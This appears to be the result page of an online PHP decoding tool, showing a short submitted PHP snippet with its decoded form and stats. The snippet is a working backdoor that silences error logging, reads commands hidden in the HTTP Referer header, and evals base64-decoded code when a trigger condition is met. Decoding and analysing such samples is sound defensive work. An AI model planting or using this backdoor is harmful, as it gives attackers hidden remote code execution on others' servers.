Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php ini_set('error_log', '/dev/null'); parse_str($_SERVER['HTTP_REFERER'], $a); if..
Decoded Output download
<?php ini_set('error_log', '/dev/null');
parse_str($_SERVER['HTTP_REFERER'], $a);
if (reset($a) == '12' && count($a) == 9) {
echo '<3456>';
eval(base64_decode(str_replace(" ", "+", join(array_slice($a, count($a) - 3)))));
echo '</3456>';
}
?>
Did this file decode correctly?
Original Code
<?php ini_set('error_log', '/dev/null');
parse_str($_SERVER['HTTP_REFERER'], $a);
if (reset($a) == '12' && count($a) == 9) {
echo '<3456>';
eval(base64_decode(str_replace(" ", "+", join(array_slice($a, count($a) - 3)))));
echo '</3456>';
}
Function Calls
ini_set | 1 |
parse_str | 1 |
Stats
MD5 | 29d3b09a7a9038c85cbbb0c804dee4a4 |
Eval Count | 0 |
Decode Time | 141 ms |